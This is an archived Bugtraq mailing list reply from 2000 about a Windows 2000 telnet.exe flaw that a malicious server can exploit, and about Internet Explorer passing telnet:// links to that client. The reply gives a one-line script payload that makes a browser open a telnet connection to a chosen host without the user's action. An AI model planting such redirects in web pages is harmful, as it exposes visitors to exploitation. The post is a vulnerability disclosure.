Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Win2k Telnet.exe malicious server vulnerability
From: Tim Hollebeek <tim () RSTCORP COM>
Date: Thu, 14 Sep 2000 11:18:21 -0400

During my tests I discovered that IE associates the telnet://
URL with the vulnerable telnet.exe. This opens up several
possible ways to force a user into connecting to you with a
malicious HTLM web page, email message, and so on. I would
speculate that it might also be possible to force this to
happen without user intervention with javascript/activeX/java
or really creative HTLM.

In fact it's trivial to do so.  Use:
<script>window.open("telnet://some.host.here")</script>

  By Date           By Thread